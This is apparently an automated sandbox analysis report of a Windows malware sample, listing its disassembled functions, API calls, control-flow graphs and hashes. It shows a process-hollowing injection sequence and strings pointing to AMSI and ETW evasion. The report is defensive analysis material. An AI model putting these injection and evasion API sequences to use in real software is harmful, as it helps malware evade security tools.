                                                                • String ID: AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$GetEventLogInformation$Initialize$NotifyChangeEventLog$NtCreateFile$NtOpenFile$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$advapi32$iexpress$iexpress.exe$kernel32$ntdll$shell32
                                                                • API String ID: 1692551227-2165151845
                                                                • Opcode ID: 433c3dc48400b18127e24fef960a197feb1e5b1277c4e2433686579fa01b34af
                                                                • Instruction ID: ba0e1fe8697d27f9d797a8f96bc0060d5120d44d3c9b5eb9f625db1ebe53dd4b
                                                                • Opcode Fuzzy Hash: 433c3dc48400b18127e24fef960a197feb1e5b1277c4e2433686579fa01b34af
                                                                • Instruction Fuzzy Hash: 2EF20C3EA0111A8BDF21FB68DC80ADE73B6EF84300F1484E69109E7315DE74AE959F56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02885D0C Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184registrystringlibraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3859 2885d0c-2885d4d GetModuleFileNameA RegOpenKeyExA 3860 2885d8f-2885dd2 call 2885b48 RegQueryValueExA 3859->3860 3861 2885d4f-2885d6b RegOpenKeyExA 3859->3861 3868 2885dd4-2885df0 RegQueryValueExA 3860->3868 3869 2885df6-2885e10 RegCloseKey 3860->3869 3861->3860 3862 2885d6d-2885d89 RegOpenKeyExA 3861->3862 3862->3860 3864 2885e18-2885e49 lstrcpyn GetThreadLocale GetLocaleInfoA 3862->3864 3866 2885e4f-2885e53 3864->3866 3867 2885f32-2885f39 3864->3867 3870 2885e5f-2885e75 lstrlen 3866->3870 3871 2885e55-2885e59 3866->3871 3868->3869 3872 2885df2 3868->3872 3869->3864 3873 2885e78-2885e7b 3870->3873 3871->3867 3871->3870 3872->3869 3874 2885e7d-2885e85 3873->3874 3875 2885e87-2885e8f 3873->3875 3874->3875 3876 2885e77 3874->3876 3875->3867 3877 2885e95-2885e9a 3875->3877 3876->3873 3878 2885e9c-2885ec2 lstrcpyn LoadLibraryExA 3877->3878 3879 2885ec4-2885ec6 3877->3879 3878->3879 3879->3867 3880 2885ec8-2885ecc 3879->3880 3880->3867 3881 2885ece-2885efe lstrcpyn LoadLibraryExA 3880->3881 3881->3867 3882 2885f00-2885f30 lstrcpyn LoadLibraryExA 3881->3882 3882->3867
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02885D28
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885D46
                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885D64
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02885D82
                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02885E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02885DCB
                                                                • RegQueryValueExA.ADVAPI32(?,02885F78,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02885E11,?,80000001), ref: 02885DE9
                                                                • RegCloseKey.ADVAPI32(?,02885E18,00000000,00000000,00000005,00000000,02885E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885E0B
                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02885E28
                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02885E35
                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02885E3B
                                                                • lstrlen.KERNEL32(00000000), ref: 02885E66
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02885EAD
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885EBD
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02885EE5
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885EF5
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885F1B
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02885F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                • API String ID: 1759228003-3917250287
                                                                • Opcode ID: f3551c483fb0094dab07f0931b2c72906d9cd233e068b6a25d591cf2ac3b953b
                                                                • Instruction ID: ead5cc0c037d4b5c2ad6fbfe397aef70c56e1af6e7ebe9552fe4a60beb6e95df
                                                                • Opcode Fuzzy Hash: f3551c483fb0094dab07f0931b2c72906d9cd233e068b6a25d591cf2ac3b953b
                                                                • Instruction Fuzzy Hash: 3651AB7DA4020D7EFB21E6E48C85FEF77ADDB04740F8101A1A608E6181EB789A458F61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028948A4 Relevance: 13.7, APIs: 9, Instructions: 188threadmemoryinjectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 02894959
                                                                • GetThreadContext.KERNEL32(028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 0289497B
                                                                • ReadProcessMemory.KERNEL32(028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C), ref: 028949A3
                                                                • NtUnmapViewOfSection.NTDLL(028DD34C,7EF60310), ref: 028949C7
                                                                • VirtualAllocEx.KERNEL32(028DD34C,7EF60310,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 028949EF
                                                                • VirtualAllocEx.KERNEL32(028DD34C,00000000,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 02894A13
                                                                • WriteProcessMemory.KERNEL32(028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AD1
                                                                • SetThreadContext.KERNEL32(028DD350,028DD3A0,028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AF4
                                                                • ResumeThread.KERNEL32(028DD350,028DD350,028DD3A0,028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AFF
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ProcessThread$AllocContextMemoryVirtual$CreateReadResumeSectionUnmapViewWrite
                                                                • String ID:
                                                                • API String ID: 2875846476-0
                                                                • Opcode ID: c2d0f14e0e0180d0e31a24009f0181e5bd55293247d535567a5efebc161b9a92
                                                                • Instruction ID: 99a1791fba87009eb66d68a42603a9df7488f331e1b449c22466f1710d99b450
                                                                • Opcode Fuzzy Hash: c2d0f14e0e0180d0e31a24009f0181e5bd55293247d535567a5efebc161b9a92
                                                                • Instruction Fuzzy Hash: 42611CBEB82200AFE758EB6CDC81F1637EAB748704F498854F645DB381D274F8298B55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028948A2 Relevance: 12.2, APIs: 8, Instructions: 166threadmemoryinjectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 02894959
                                                                • GetThreadContext.KERNEL32(028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 0289497B
                                                                • ReadProcessMemory.KERNEL32(028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C), ref: 028949A3
                                                                • NtUnmapViewOfSection.NTDLL(028DD34C,7EF60310), ref: 028949C7
                                                                • VirtualAllocEx.KERNEL32(028DD34C,7EF60310,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 028949EF
                                                                • VirtualAllocEx.KERNEL32(028DD34C,00000000,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 02894A13
                                                                • WriteProcessMemory.KERNEL32(028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AD1
                                                                • SetThreadContext.KERNEL32(028DD350,028DD3A0,028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AF4
                                                                • ResumeThread.KERNEL32(028DD350,028DD350,028DD3A0,028DD34C,028DD478,00000000,00000000,028DD47C,028DD35C,028DD34C), ref: 02894AFF
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ProcessThread$AllocContextMemoryVirtual$CreateReadResumeSectionUnmapViewWrite
                                                                • String ID:
                                                                • API String ID: 2875846476-0
                                                                • Opcode ID: 0521b361addd2c1445717f834a05b8b6dbeaae493f51bc4e9e8e5e4992a22fc3
                                                                • Instruction ID: 547ab5526bd38080e86ecb17b5d6e5cfe132bf145152acd0a8473f353e0e2091
                                                                • Opcode Fuzzy Hash: 0521b361addd2c1445717f834a05b8b6dbeaae493f51bc4e9e8e5e4992a22fc3
                                                                • Instruction Fuzzy Hash: D3511CBEB82200AFE718EB6CDD81F1637EAB748704F488854F545DB381E674F8298B51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0289521C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 59networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 4974 289521c-2895260 InternetOpenA call 2884d64 InternetOpenUrlA 4977 2895262-2895264 4974->4977 4978 2895266-289529f HttpQueryInfoA 4974->4978 4979 28952db-28952e9 InternetCloseHandle 4977->4979 4980 28952a1-28952a3 4978->4980 4981 28952a5-28952c8 call 2884b10 call 2884cb0 4978->4981 4982 28952d0-28952d6 InternetCloseHandle 4980->4982 4987 28952ca-28952cc 4981->4987 4988 28952ce 4981->4988 4982->4979 4987->4982 4988->4982
                                                                APIs
                                                                • InternetOpenA.WININET(lVali,00000004,00000000,00000000,00000000), ref: 0289522C
                                                                • InternetOpenUrlA.WININET(028DDAA4,00000000,00000000,00000000,00000200,00000000), ref: 0289524F
                                                                • HttpQueryInfoA.WININET(028DDAA8,00000013,200,028DDCB4,028DDCB0), ref: 0289528E
                                                                • InternetCloseHandle.WININET(028DDAA8), ref: 028952D6
                                                                • InternetCloseHandle.WININET(028DDAA4), ref: 028952E1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuery
                                                                • String ID: 200$200$lVali
                                                                • API String ID: 3871184103-2774994813
                                                                • Opcode ID: 824630d53ee381470818bc93ffef1a291d76ed6c6c0cf8a0662a660eb2c01037
                                                                • Instruction ID: 743814de81252176ecc41a3374c5dfcdafd391ad1889e5ee597c141d8a2a58eb
                                                                • Opcode Fuzzy Hash: 824630d53ee381470818bc93ffef1a291d76ed6c6c0cf8a0662a660eb2c01037
                                                                • Instruction Fuzzy Hash: 6411887EB8A3006EFB50BBF9AC81B023399A704704F101C25B600DFBC4C6F8942C8B14
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02881757 Relevance: 9.0, APIs: 7, Instructions: 288sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5056 2881757-2881766 5057 2881998-288199d 5056->5057 5058 288176c-288177c 5056->5058 5059 2881ab0-2881ab3 5057->5059 5060 28819a3-28819b4 5057->5060 5061 288177e-288178b 5058->5061 5062 28817d4-28817dd 5058->5062 5068 2881ab9-2881abb 5059->5068 5069 28816b4-28816dd VirtualAlloc 5059->5069 5063 2881968-2881975 5060->5063 5064 28819b6-28819d2 5060->5064 5065 288178d-288179a 5061->5065 5066 28817a4-28817b0 5061->5066 5062->5061 5067 28817df-28817eb 5062->5067 5063->5064 5070 2881977-288198b Sleep 5063->5070 5073 28819e0-28819ef 5064->5073 5074 28819d4-28819dc 5064->5074 5077 288179c-28817a0 5065->5077 5078 28817c4-28817d1 5065->5078 5071 2881820-2881829 5066->5071 5072 28817b2-28817c0 5066->5072 5067->5061 5079 28817ed-28817f9 5067->5079 5075 288170f-2881715 5069->5075 5076 28816df-288170c call 2881674 5069->5076 5070->5064 5080 288198d-2881994 Sleep 5070->5080 5086 288182b-2881838 5071->5086 5087 288185c-2881866 5071->5087 5083 2881a08-2881a10 5073->5083 5084 28819f1-2881a05 5073->5084 5081 2881a3c-2881a52 5074->5081 5076->5075 5079->5061 5085 28817fb-288180e Sleep 5079->5085 5080->5063 5088 2881a6b-2881a77 5081->5088 5089 2881a54-2881a62 5081->5089 5094 2881a2c-2881a2e call 28815fc 5083->5094 5095 2881a12-2881a2a 5083->5095 5084->5081 5085->5061 5093 2881814-288181b Sleep 5085->5093 5086->5087 5096 288183a-288184e Sleep 5086->5096 5090 28818d8-28818e4 5087->5090 5091 2881868-2881893 5087->5091 5100 2881a98 5088->5100 5101 2881a79-2881a8c 5088->5101 5089->5088 5097 2881a64 5089->5097 5102 288190c-288191b call 28815fc 5090->5102 5103 28818e6-28818f8 5090->5103 5098 28818ac-28818ba 5091->5098 5099 2881895-28818a3 5091->5099 5093->5062 5104 2881a33-2881a3b 5094->5104 5095->5104 5096->5087 5106 2881850-2881857 Sleep 5096->5106 5097->5088 5108 2881928 5098->5108 5109 28818bc-28818d6 call 2881530 5098->5109 5099->5098 5107 28818a5 5099->5107 5110 2881a9d-2881aaf 5100->5110 5101->5110 5111 2881a8e-2881a93 call 2881530 5101->5111 5115 288192d-2881966 5102->5115 5121 288191d-2881927 5102->5121 5112 28818fa 5103->5112 5113 28818fc-288190a 5103->5113 5106->5086 5107->5098 5108->5115 5109->5115 5111->5110 5112->5113 5113->5115
                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 02881800
                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 02881816
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 339aa77042e4ad5626e56c00738c805374e23f839594c2eac8c1aedf6257c3da
                                                                • Instruction ID: d993cfd9d1be879035d2d0741c2e44d3a4e1cd8c22c09a025e51d60298e936ef
                                                                • Opcode Fuzzy Hash: 339aa77042e4ad5626e56c00738c805374e23f839594c2eac8c1aedf6257c3da
                                                                • Instruction Fuzzy Hash: 76B1457EA022418BC719EF28D898355BBE1FB80315F1886AED49DCB3C5CB709467CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02881ABF Relevance: 7.7, APIs: 6, Instructions: 173sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5122 2881abf-2881acb 5123 2881b9c-2881b9f 5122->5123 5124 2881ad1-2881ad5 5122->5124 5125 2881c8c-2881c90 5123->5125 5126 2881ba5-2881baf 5123->5126 5127 2881b38-2881b41 5124->5127 5128 2881ad7-2881ade 5124->5128 5132 2881718-2881720 call 2881674 5125->5132 5133 2881c96-2881c9b 5125->5133 5130 2881b6c-2881b79 5126->5130 5131 2881bb1-2881bbd 5126->5131 5127->5128 5129 2881b43-2881b57 Sleep 5127->5129 5134 2881b0c-2881b0e 5128->5134 5135 2881ae0-2881aeb 5128->5135 5129->5128 5138 2881b5d-2881b68 Sleep 5129->5138 5130->5131 5140 2881b7b-2881b8f Sleep 5130->5140 5141 2881bbf-2881bc2 5131->5141 5142 2881bf4-2881c02 5131->5142 5148 2881725-288173b VirtualFree 5132->5148 5143 2881b10-2881b21 5134->5143 5144 2881b23 5134->5144 5136 2881aed-2881af2 5135->5136 5137 2881af4-2881b09 5135->5137 5138->5127 5140->5131 5149 2881b91-2881b98 Sleep 5140->5149 5147 2881bc6-2881bca 5141->5147 5146 2881c04-2881c09 call 28814f0 5142->5146 5142->5147 5143->5144 5145 2881b26-2881b33 5143->5145 5144->5145 5145->5126 5146->5147 5153 2881c0c-2881c19 5147->5153 5154 2881bcc-2881bd2 5147->5154 5151 288173d-2881744 5148->5151 5152 2881746 5148->5152 5149->5130 5157 2881749-2881753 5151->5157 5152->5157 5153->5154 5156 2881c1b-2881c22 call 28814f0 5153->5156 5158 2881c24-2881c2e 5154->5158 5159 2881bd4-2881bf2 call 2881530 5154->5159 5156->5154 5157->5122 5161 2881c5c-2881c89 call 2881590 5158->5161 5162 2881c30-2881c58 VirtualFree 5158->5162
                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 02881B47
                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 02881B61
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 5b1838660acd6b02444d98f1b834656484d2ee2185bf0f3542e325e15ee2e464
                                                                • Instruction ID: b06532cfdab72fff8b3926bafc5d1130e677481b90024cb2ac6500727e03c244
                                                                • Opcode Fuzzy Hash: 5b1838660acd6b02444d98f1b834656484d2ee2185bf0f3542e325e15ee2e464
                                                                • Instruction Fuzzy Hash: A051D37D6012408FE715EF6CD988755BBE1AF45318F1885AED44CCB386EBB0D846CB92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028835DC Relevance: 4.6, APIs: 3, Instructions: 69fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5168 28835dc-28835f1 5169 2883608-2883623 5168->5169 5170 28835f3-28835f6 5168->5170 5173 2883685-288368f 5169->5173 5174 2883625-2883644 5169->5174 5171 28835fc-2883601 5170->5171 5172 288369e-28836a3 5170->5172 5171->5169 5185 2883603 call 2882d48 5171->5185 5175 28836b0 call 2882d48 5172->5175 5178 2883691-2883693 5173->5178 5179 2883695 5173->5179 5176 2883646-288364c 5174->5176 5177 2883667-2883677 CreateFileA 5174->5177 5186 28836b5-28836b8 5175->5186 5176->5177 5183 288364e-288365a 5176->5183 5184 288367c-288367f 5177->5184 5180 2883697-288369c GetStdHandle 5178->5180 5179->5180 5180->5184 5183->5177 5187 288365c-2883661 5183->5187 5188 2883681-2883683 5184->5188 5189 28836a5-28836ab GetLastError 5184->5189 5185->5169 5187->5177 5188->5186 5189->5175
                                                                APIs
                                                                • CreateFileA.KERNEL32(028DD940,80000000,?,00000000,00000003,00000080,00000000,?,?,?,028836D5,02896CE7,ScanBuffer,0289AD5C,OpenSession,0289AD5C), ref: 02883677
                                                                • GetStdHandle.KERNEL32(000000F5,?,?,?,028836D5,02896CE7,ScanBuffer,0289AD5C,OpenSession,0289AD5C,ScanBuffer,0289AD5C,028DD8E0,ScanBuffer,0289AD5C,ScanString), ref: 02883697
                                                                • GetLastError.KERNEL32(000000F5,?,?,?,028836D5,02896CE7,ScanBuffer,0289AD5C,OpenSession,0289AD5C,ScanBuffer,0289AD5C,028DD8E0,ScanBuffer,0289AD5C,ScanString), ref: 028836AB
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorFileHandleLast
                                                                • String ID:
                                                                • API String ID: 1572049330-0
                                                                • Opcode ID: 01325415e7d9095eab0e5347096720845385928870c510d4fb87ea9e5cfec5fc
                                                                • Instruction ID: c7bea5578384e94017227e31f9216dddc605e65fa82756cdc986f9e940ea7d21
                                                                • Opcode Fuzzy Hash: 01325415e7d9095eab0e5347096720845385928870c510d4fb87ea9e5cfec5fc
                                                                • Instruction Fuzzy Hash: 8C110AAD20020066EB24FF1CC9887267A959F84B2CF18C3C6D60DCF39AEA71C844D756
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028936CC Relevance: 4.6, APIs: 3, Instructions: 62libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5191 28936cc-2893722 call 2884d54 * 2 call 2884d64 call 2884a98 call 288cab0 5202 2893724-2893736 GetModuleHandleA 5191->5202 5203 2893777-2893791 call 28848c4 5191->5203 5206 2893738-2893759 call 2884d64 GetProcAddress 5202->5206 5207 289376c-2893772 FreeLibrary 5202->5207 5211 289375b 5206->5211 5212 289375d-2893767 call 28936a0 5206->5212 5207->5203 5211->5212 5212->5207
                                                                APIs
                                                                  • Part of subcall function 0288CAB0: SetErrorMode.KERNEL32 ref: 0288CABA
                                                                  • Part of subcall function 0288CAB0: LoadLibraryA.KERNEL32(00000000,00000000,0288CB04,?,00000000,0288CB22), ref: 0288CAE9
                                                                • GetModuleHandleA.KERNEL32 ref: 02893725
                                                                • GetProcAddress.KERNEL32(028DD2F8,00000000), ref: 02893748
                                                                • FreeLibrary.KERNEL32(028DD2F8,00000000,00000000,02893792), ref: 02893772
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressErrorFreeHandleLoadModeModuleProc
                                                                • String ID:
                                                                • API String ID: 2211333376-0
                                                                • Opcode ID: ff6db56750c9d10c73ef9fa3f341b05ba35f08e00e3ac5550da1a07bfb36a09b
                                                                • Instruction ID: 85f0b904362b6fa2d3ec7b43c9981e9d8dfcdb089e0bc7b7ca5cee991d870aa6
                                                                • Opcode Fuzzy Hash: ff6db56750c9d10c73ef9fa3f341b05ba35f08e00e3ac5550da1a07bfb36a09b
                                                                • Instruction Fuzzy Hash: 5D118EBDA41205AFDB04FBB9D880A8EB7A9EB45300F5188B5E424D3290EB34A954CF12
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02893798 Relevance: 4.5, APIs: 3, Instructions: 32libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5214 2893798 GetModuleHandleA 5216 2893738-2893759 call 2884d64 GetProcAddress 5214->5216 5217 289376c-2893791 FreeLibrary call 28848c4 5214->5217 5222 289375b 5216->5222 5223 289375d-2893767 call 28936a0 5216->5223 5222->5223 5223->5217
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32 ref: 02893725
                                                                • GetProcAddress.KERNEL32(028DD2F8,00000000), ref: 02893748
                                                                • FreeLibrary.KERNEL32(028DD2F8,00000000,00000000,02893792), ref: 02893772
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID:
                                                                • API String ID: 4061214504-0
                                                                • Opcode ID: 77bffbdf973947bb02e0dcd54cb64c489eb61bde12b56d18b4b50b6c8328ff1d
                                                                • Instruction ID: f80c5092d75ebc0d80360cecf1e4c275130d099abb185707b4c064d932b7540c
                                                                • Opcode Fuzzy Hash: 77bffbdf973947bb02e0dcd54cb64c489eb61bde12b56d18b4b50b6c8328ff1d
                                                                • Instruction Fuzzy Hash: 20F0BEBEA82101AFEB04BB79D844B4AB3A9E744304F454CA5E024C3284EB35E498CF02
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288455C Relevance: 3.1, APIs: 2, Instructions: 125COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5226 288455c-28845a0 5227 28845a2 5226->5227 5228 28845a4-28845d6 call 2884448 5226->5228 5227->5228 5231 28845d8-28845da 5228->5231 5232 28845df-28845e6 5228->5232 5231->5232 5235 28845dc 5231->5235 5233 28845e8-28845eb 5232->5233 5234 28845f0-28845f6 5232->5234 5233->5234 5236 28845f8 5234->5236 5237 28845fb-2884602 5234->5237 5235->5232 5236->5237 5238 2884611-2884615 5237->5238 5239 2884604-288460b 5237->5239 5240 288461b call 28844f4 5238->5240 5241 28847ac-28847be 5238->5241 5239->5238 5248 2884620 5240->5248 5242 28847c0-28847c3 5241->5242 5243 28847d4-28847db 5241->5243 5242->5243 5245 28847c5-28847d2 5242->5245 5246 28847dd-28847e9 call 288468c call 2884720 5243->5246 5247 28847ee-28847f2 5243->5247 5245->5243 5246->5247 5250 2884802-288480b call 2884490 5247->5250 5251 28847f4-28847fb 5247->5251 5248->5241 5258 288480d-2884814 5250->5258 5259 2884816-288481b 5250->5259 5251->5250 5254 28847fd-28847ff 5251->5254 5254->5250 5258->5259 5261 2884839-2884842 call 2884468 5258->5261 5259->5261 5262 288481d-288482d call 288607c 5259->5262 5268 2884844 5261->5268 5269 2884847-288484b 5261->5269 5262->5261 5267 288482f-2884831 5262->5267 5267->5261 5270 2884833-2884834 FreeLibrary 5267->5270 5268->5269 5271 288484d call 28846f0 5269->5271 5272 2884852-2884855 5269->5272 5270->5261 5271->5272 5273 2884871-288487e 5272->5273 5274 2884857-288485e 5272->5274 5273->5247 5276 2884860 5274->5276 5277 2884866-288486c ExitProcess 5274->5277 5276->5277
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 308d68aa1d156c91315cdba5e08fdee3d25c5c621d691da675b93fca1bd028c3
